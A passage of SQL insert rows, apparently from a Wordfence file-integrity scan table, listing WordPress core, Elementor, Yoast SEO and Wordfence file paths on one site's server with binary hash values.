('��\\:��ڈ��)g,\\','wp-includes/images/smilies/icon_twisted.gif','/var/www/html/ictbank/blog/wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),
('��!��E��S7�x����','wp-content/wflogs/rules.php','/var/www/html/ictbank/blog/wp-content/wflogs/rules.php',0,'j��9�m{�v\'���4��','j��9�m{�v\'���4��','\'�B���\'�6K�����ת%^Y��J@t�>','',0,'?'),
('�����t^czbK4��','wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-basic.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-I8�\']�\0�R�f�','k҉�r���;L�� i�u�9%�rU��c�v��','',0,'?'),
('���3v�U�\Z3�P�^O ','wp-admin/css/widgets-rtl.css','/var/www/html/ictbank/blog/wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T���,�Z�6�','Ƃd��[�}ݖw�/jBd���\r%��`���Y3D','',0,'?'),
('����4��<�ϾDVi-','wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/atoms/indicator-bullet.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/atoms/indicator-bullet.js',0,'ly�&�zl�5�','ly�&�zl�5�','����K!>�:Y��B����ź���{L�\'L. ','',0,'?'),
('���6I߯Z�x�&\rX','wp-content/plugins/wordpress-seo/packages/js/images/star-rating-half.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/packages/js/images/star-rating-half.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����f�l�!��a��]','(��,�*��,13��>�Ԣ�*��?3=�h4S8','',0,'?'),
('��L �U���f��u�<','wp-admin/images/icons32-vs.png','/var/www/html/ictbank/blog/wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�P*���{>v��Uf','����?U��z��P\\��@�`�8g;\r����E','',0,'?'),
('���86?���b�%��`�','wp-content/plugins/elementor/assets/css/widget-progress.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/widget-progress.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x�ja�r��4v`�H','%nUJ�5��2��5�R�~�8�-$j6-���ͧ�','',0,'?'),
('���Y����x���Q','wp-content/plugins/wordpress-seo/src/integrations/front-end/wp-robots-integration.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/front-end/wp-robots-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/f�Hy�ns��J3\'','��xz�/E�4��\ZP�sI��k:�3���]/�','',0,'?'),
('��\\��^�@P/�\n�R\'�','wp-content/plugins/elementor/assets/js/admin-top-bar.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/admin-top-bar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Dbi#���i���','�ÜU�a��l�b�N�T�Iv�I��!�I�','',0,'?'),
('��=~�fCӸ���;ˠ','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8���PruI��b�u�h�',')�\Z-��\r�2��!i IIU���CC�NV=�d','',0,'?'),
('��y \\\\�\r �Kn��','wp-content/plugins/elementor-pro/modules/display-conditions/conditions/post-author-condition.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/display-conditions/conditions/post-author-condition.php',0,'�\r����+9��C�','�\r����+9��C�','>�������/-�,�t�`~�\"#�=�Um','',0,'?'),
('��v�d�EI����|�I�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/ristretto255.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i3�s&���a�\Zw','��M�8Jg��A�\r��`cY5�~>,Ea%��og','',0,'?'),
('�� ��b�����#D','wp-content/plugins/elementor-pro/core/data/endpoints/refresh-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/data/endpoints/refresh-base.php',0,'>��Ol�뿃jXG�W','>��Ol�뿃jXG�W','�<�,�\\=�xxd��J�i�b�n,�e�>\n2V�L','',0,'?'),
('���_�i�FBd�oc�tz','wp-content/plugins/elementor-pro/assets/css/widget-loop-builder-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-loop-builder-rtl.min.css',0,'6�����4�w.��)','6�����4�w.��)','�U��q�2�����캣��\'��\'�\'���\'w0N','',0,'?'),
('�Z��Q+x�r��0��','wp-includes/blocks/media-text/editor.css','/var/www/html/ictbank/blog/wp-includes/blocks/media-text/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�4�v����]� /~','�y��;%�qL���.���!z��\\aDR\nQ����','',0,'?'),
('�@�.m<\\�?��_�h','wp-content/plugins/elementor/includes/controls/groups/text-shadow.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/controls/groups/text-shadow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:A1uW��Ή�','�q�\nz�\\Ֆ�>u�Ո��I�%h`��b�TS�','',0,'?'),
('�\" 6A��7^�H�','wp-includes/blocks/cover/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/cover/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ۊ@�{����w�','���d����=\rۖ���_ey���I���','',0,'?'),
('�+Y��47���2ue�','wp-content/plugins/elementor/core/utils/static-collection.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/utils/static-collection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�a ������G�t','6���C^Ο��)����s܉ߖ�����?�','',0,'?'),
('�-��u/�p:8c|~�','wp-content/plugins/elementor/core/isolation/wordpress-adapter.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/isolation/wordpress-adapter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�X[R=���','�ۅ5H*�LK��� �fl���:�98��','',0,'?'),
('�:=�%����M�۵','wp-includes/template.php','/var/www/html/ictbank/blog/wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���؟�\0�\n��8','l\' \n�< T�:/U1�OB���CI��w�b','',0,'?'),
('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif','/var/www/html/ictbank/blog/wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)� >','',0,'?'),
('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js','/var/www/html/ictbank/blog/wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�3���Z�q','���V)1�Љ8�Q�i�r8����\"����HN��','',0,'?'),
('�f��Md�\0��sZ�K�','wp-content/uploads/2021/05/Slide01.jpg','/var/www/html/ictbank/blog/wp-content/uploads/2021/05/Slide01.jpg',0,'os�c�Z\0��Ӆ#d0�','os�c�Z\0��Ӆ#d0�','�� hs��@Ob�������Aڮ�kA�۲k$','',0,'?'),
('�id�^,�4�@= ��9�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LoggerInterface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LoggerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kj��J��7r_�a�','\nŘE����s��럣;��v���U:r','',0,'?'),
('�~G꒦�Wv_����y','wp-content/plugins/elementor/modules/gutenberg/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/gutenberg/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�k��&,P\"�_�1�V','�ռXj������|�D�Ջ���ɔ%Ҍ�B��','',0,'?'),
('�~�c����*c�{i','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9 �� TD$FgiEn�','������S]�S�(n���Z\0�ʲ��','',0,'?'),
('���eM�y*Ҟ����','wp-includes/js/backbone.js','/var/www/html/ictbank/blog/wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�/1]}�&f����\0','��^U�#2�y��v���%�^�\'2.����W�','',0,'?'),
('���3.�\Z�=�k_8�','wp-content/plugins/wordpress-seo/src/exceptions/oauth/authentication-failed-exception.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/exceptions/oauth/authentication-failed-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Jp�l��b�7�','����g1���T�4BP�#�l�l�.���cLE','',0,'?'),
('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php','/var/www/html/ictbank/blog/wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zt�UG<���>�','jN����LJ�O_1O���_�z��C�r','',0,'?'),
('��#�dl|M�SRə','wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������rY�-��','�����S����� �{o�5���V�z-��','',0,'?'),
('����B�+�y\0x�a�$','wp-includes/blocks/table/theme-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/table/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*������\'V�m�','����B��O����&��\'�o1IYy�%D','',0,'?'),
('���B�����9�\r','wp-content/plugins/elementor/assets/js/packages/editor-site-navigation/editor-site-navigation.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/packages/editor-site-navigation/editor-site-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jy����r\0�I\0','Ж_�Ǿ�U�z�K\"5��\\i$���WC�N�TL','',0,'?'),
('�����p��A�z1w','wp-includes/blocks/navigation/style-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/navigation/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҮwU���A��\Z�','����N뀲��������C��W��\\�f�','',0,'?'),
('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),
('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),
('��n�T��䗙�υ�','wp-content/themes/hello-elementor/index.php','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r]^A�ۃ$��:iM','�xc�H�t����Ǭ���f{eI� ({��0��','',0,'?'),
('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ݤ)e��&�vW4�',']Z��*W�!Oe�H�v8�al��|�\r�30���','',0,'?'),
('���\'�6,-Ao��[','wp-content/plugins/elementor-pro/modules/loop-builder/skins/skin-loop-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/loop-builder/skins/skin-loop-base.php',0,'��u��.��t|r��#','��u��.��t|r��#','��M,�\\2�8\Z��c_�\\8�儅e� ','',0,'?'),
('��CR�w��BSE��','wp-content/plugins/elementor/assets/js/editor-environment-v2.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/editor-environment-v2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�n��s�0��I','�,���lKBޚ[C�|(��3�}�ںBxu��','',0,'?'),
('��a�,���tf��)�','wp-content/plugins/elementor/assets/css/frontend-lite-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/frontend-lite-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R��}�N�~�k�','������;]���g� ?�X�����@?�','',0,'?'),
('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php','/var/www/html/ictbank/blog/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UTe�V9l1�[M��','�^���1�j��U�+�r*��uA��u�&1','',0,'?'),
('��&���cNX.�xqZ','wp-content/plugins/elementor/data/base/processor/before.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/data/base/processor/before.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��\n�F�@�ߛS�M','��J���Px���D|8�{Y\n�gv�','',0,'?'),
('��z]����6�2L�','wp-content/plugins/elementor-pro/modules/woocommerce/classes/current-query-renderer.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/classes/current-query-renderer.php',0,'�?I�\r#ş�~r״','�?I�\r#ş�~r״','����-�4\n��m����V�m�ҭzJ','',0,'?'),
('�Km)�&c�7�9!�a','wp-content/plugins/wordpress-seo/lib/migrations/column.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/lib/migrations/column.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�`_^>뻪Ӽ?��','���?�>b�J@�q��Gz��~ӄ��u��a�','',0,'?'),
('�\n�Gi���k��OA�','wp-content/plugins/elementor/modules/editor-events/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/editor-events/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�IE�ۆm�\\�','<Z�����D�#�����֜8$�|`\ZiT���Ƅ','',0,'?'),
('�[��q|�O)0<���','wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-failed-notification-presenter.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-failed-notification-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��LMt#7����','E)�ia�.U�+jҿADz4vQvxR����b��','',0,'?'),
('� ��g����%�!�','wp-includes/blocks/site-logo.php','/var/www/html/ictbank/blog/wp-includes/blocks/site-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')i8纷b���ׂ[@�','mJltJ�I!��������������9�z�o�','',0,'?'),
('� �&?�F�ZiE�Od','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�q,�}�+C�Q�z','���3\nu�!���sz�vE���6���a��0K�','',0,'?'),
('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php','/var/www/html/ictbank/blog/wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+$��@3���f����+','Ad���F:qfO,!ѓ��&D6C�I,��','',0,'?'),
('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php','/var/www/html/ictbank/blog/wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�}?{G��j�eGi�','eg��v��\Z�x��!�74��F�\n�����D�','',0,'?'),
('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php','/var/www/html/ictbank/blog/wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0k��E�.К�a#',' ,�w>M�?%9,�H�b����ץ*�\'�','',0,'?'),
('�H5�-����١���','wp-content/plugins/elementor-pro/assets/css/widget-progress-tracker.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-progress-tracker.min.css',0,'K�\0QN;$(-���SN��','K�\0QN;$(-���SN��','���@q��rJW~%d��\"2�f���5�c#','',0,'?'),
('�LM\nJ1���(��l��','wp-content/plugins/elementor-pro/plugin.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/plugin.php',0,'\'��ya�+E�+bs���','\'��ya�+E�+bs���','�PUgf�F��Z�@{��A����y� �\n:�\r','',0,'?'),
('�N\0m\\*��<!rY�>','wp-content/plugins/elementor-pro/modules/woocommerce/conditions/shop-page.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/conditions/shop-page.php',0,'\\��17��6�n�Ğ�','\\��17��6�n�Ğ�',';s�tZ}�JՐ_k ��ʟ��.L��A\'','',0,'?'),
('�X*����VL �_�','wp-includes/css/dist/block-library/editor-rtl.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���.-��^d�','��#��Wؔq�ً�&de�C\";��ѷ^','',0,'?'),
('�_� ��6T���NG?','wp-includes/blocks/search/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/search/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��`���ˁ)W��','��̴�<�V���N5pE�����A\"C诛','',0,'?'),
('�`�o��.QS��`�','wp-includes/blocks/image/theme.css','/var/www/html/ictbank/blog/wp-includes/blocks/image/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k~��B0�','��W�ߤ�%��m�d��D�\'.][�\Zԅc<��','',0,'?'),
('�j��I���<��iU','wp-includes/category-template.php','/var/www/html/ictbank/blog/wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7l��:ؤ=��)�.�X','�G�;`�9\Z\"�~���j�z�S$�ؕ','',0,'?'),
('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js','/var/www/html/ictbank/blog/wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���I>��_�@�\"�','�I�0�L\0��\r\'�}��g`��z _(���%','',0,'?'),
('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css','/var/www/html/ictbank/blog/wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\"*�3��Y}h9�','U�%U]7�$�0Moͧ��4�aL�yι','',0,'?'),
('�����nJ-2���5W�','wp-includes/blocks/rss/editor-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/rss/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,u�)���\'&,s�Q�','�>Qk�eG��<ӭ�Q������R�\"��I�B\Z','',0,'?'),
('��e�\\��1�tƋ�< �','wp-content/plugins/wordfence/lib/wfUpdateCheck.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��V+KI�~0�\n','�����7��&.����η��Dӛ�]e��','',0,'?'),
('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),
('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���iQ��$�g��Fr','�M�=�cS��~[\r�<�)ǖ�3O{�xھ\0�w','',0,'?'),
('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif','/var/www/html/ictbank/blog/wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��u�u�� �2���','�\\�� �u�e�T�\rv��j�!ҳ7R���','',0,'?'),
('��_ �U�h���6,p�~','wp-content/plugins/wordpress-seo/src/presenters/meta-author-presenter.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/presenters/meta-author-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\n��1�p\"#��','<��lE��T�l����bj�ք篏K]Y��','',0,'?'),
('�Ų[k�����x����{','wp-content/uploads/woocommerce-placeholder-150x150.png','/var/www/html/ictbank/blog/wp-content/uploads/woocommerce-placeholder-150x150.png',0,'�Z��0M�t5�)���','�Z��0M�t5�)���','&��;�J������?/�yq��~�l1O�VΞ','',0,'?'),
('��cK=*�GI7��!�','wp-content/plugins/elementor/assets/js/elementor-admin-bar.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/elementor-admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>m�G#����','V�P��? �QU����_q8�E��۞��)��','',0,'?'),
('��ų����[H�E�','wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/styles/shThemeFadeToGrey.css','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/styles/shThemeFadeToGrey.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'J���N�*�Q#�','��4�\"7!1⯂�0��gz�1�k�7B���7�','',0,'?'),
('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��yk0�1�pd5','!��VQ�sc.cM��ö����>S[���k����','',0,'?'),
('��u��l��H����','wp-content/plugins/elementor-pro/core/preview/preview.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/preview/preview.php',0,'.Ư�(�Fr�W����r','.Ư�(�Fr�W����r','�?P�C�9���XF|�*��|+ʗ��y�@j2','',0,'?'),
('��k�z�T�����','wp-content/plugins/wordpress-seo/js/dist/wincher-dashboard-widget.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/wincher-dashboard-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o`}� �^��lt���E','��J9=~:v �R�RL�R��\'�}���$݃\"','',0,'?'),
('��I����4T�\Z^�W','wp-content/plugins/elementor/assets/css/modules/apps/admin.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/modules/apps/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�+\\J����K�e.','E1���N����jN*�*� xX=����@S�o','',0,'?'),
('��V�Z�8�=�v���c','wp-includes/blocks/freeform/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/freeform/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Я\0\"\Zv�O>�b','t��C��I�λ鯼[���\'�G�}�t���\n�#','',0,'?'),
('��ڸP���ֺb�','wp-includes/blocks/social-link/editor.css','/var/www/html/ictbank/blog/wp-includes/blocks/social-link/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����Vf�>�Þ�GIT','�+ɿf;͙\n�-8d�xLv�!$���bƎ�#�F','',0,'?'),
('��ᨢR��]�K��|z�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/InvalidArgumentException.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/InvalidArgumentException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�||EW|U\rIfa쎗L','s�)��LM\Z(�����F��u؟8Y+x','',0,'?'),
('� y\'�s~�P\'���e','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1722265817.js','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/js/admin-global.1722265817.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q!��\0𭀠\'��','�W�4$a���\'x���-��Kμ�#�Z��','',0,'?'),
('���K�ȁ;$��z�','wp-includes/js/dist/notices.js','/var/www/html/ictbank/blog/wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�Ōh��2�<\rP�t\n','�_�x������ҍ���{\\��h7H{��=�','',0,'?'),
('�%)�����0�t��','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushSql.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushSql.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dم��S��#Yɭ',';N$6=!�ge�Pz�ٜ���;]y*��T����','',0,'?'),
('�.8y4@\n���B(|','wp-content/plugins/elementor/includes/base/sub-controls-stack.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/base/sub-controls-stack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r{�� a!�ԇ{��Z�','��Ol~�l��&]���4<�1��X&R���1','',0,'?'),
('�9��f�� ����ZN','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1722265817.js','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1722265817.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),
('�=��T�O��7\r�7�{','wp-content/plugins/wordpress-seo/packages/js/images/icon-arrow-down.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/packages/js/images/icon-arrow-down.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��- ����D�����','�7ݰ��q͊�����C�L�wI㎘|���Y','',0,'?'),
('�=��@,�����Zd��','wp-content/plugins/elementor/assets/lib/dialog/dialog.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/dialog/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@S�or�\n��a��,�','�#�\Z��-�t�R�z\0HN�+��\\�&���/���p','',0,'?'),
('�C��v��ܥ��Fv+','wp-content/plugins/wordpress-seo/src/user-meta/framework/additional-contactmethods/tumblr.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/user-meta/framework/additional-contactmethods/tumblr.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��k�`)s�\rSd�<','J\n�Al�C\Z�鎋�����Բq�O�:l���W�','',0,'?'),
('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php','/var/www/html/ictbank/blog/wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),
('�Xq�NM�\r�\\�ZZ>','wp-includes/images/media/interactive.svg','/var/www/html/ictbank/blog/wp-includes/images/media/interactive.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�3�aH[�$�^��','����K�����M4g@Mw��U���','',0,'?'),
('�_���?U9��W��','wp-content/plugins/elementor/run-on-linux.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/run-on-linux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�89����6X\\1�\Z�','�7�a���F6�$8u���\"N*�R�@�3�','',0,'?'),
('�kIK����V[�� 5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s �15�','',0,'?'),
('�rQ���;J��RM�','wp-content/plugins/elementor-pro/modules/theme-builder/views/theme-support-header.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/views/theme-support-header.php',0,'�N�YOF�?�`���','�N�YOF�?�`���','+^<��c���� ���UE؝���+��3','',0,'?'),
